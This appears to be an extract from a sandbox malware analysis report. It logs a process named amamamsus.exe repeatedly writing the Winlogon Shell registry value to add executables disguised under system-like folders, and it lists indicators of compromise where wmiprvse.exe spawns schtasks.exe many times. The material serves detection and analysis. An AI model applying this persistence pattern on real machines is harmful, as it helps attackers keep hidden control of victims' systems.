Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\", \"C:\\Windows\\en-US\\conhost.exe\", \"C:\\Windows\\CbsTemp\\winlogon.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\", \"C:\\Windows\\en-US\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\", \"C:\\Windows\\en-US\\conhost.exe\", \"C:\\Windows\\CbsTemp\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Mail\\powershell.exe\", \"C:\\Program Files\\7-Zip\\setup.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Defender\\ja-JP\\powershell.exe\", \"C:\\Program Files (x86)\\Windows Mail\\csrss.exe\", \"C:\\Windows\\Branding\\shellbrd\\smss.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Users\\Default User\\TextInputHost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\conhost.exe\", \"C:\\Windows\\en-US\\conhost.exe\", \"C:\\Windows\\CbsTemp\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Mail\\powershell.exe\", \"C:\\Program Files\\7-Zip\\setup.exe\", \"C:\\Program Files\\Windows Sidebar\\conhost.exe\""	amamamsus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\SearchApp.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\AppReadiness\\explorer.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\bcastdvr\\cmd.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Windows\\de-DE\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\taskhostw.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\cmd.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\Idle.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Windows\\DiagTrack\\smss.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\Idle.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Users\\Admin\\Desktop\\StartMenuExperienceHost.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\SppExtComObj.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\", \"C:\\Windows\\Microsoft.NET\\authman\\upfc.exe\""	amamamsus.exe

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1176	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3672	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3656	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1156	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4548	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1132	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4316	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3644	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3976	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1296	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3636	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1388	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	968	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1148	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	3040	schtasks.exe	109
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4092	3040	schtasks.exe	109
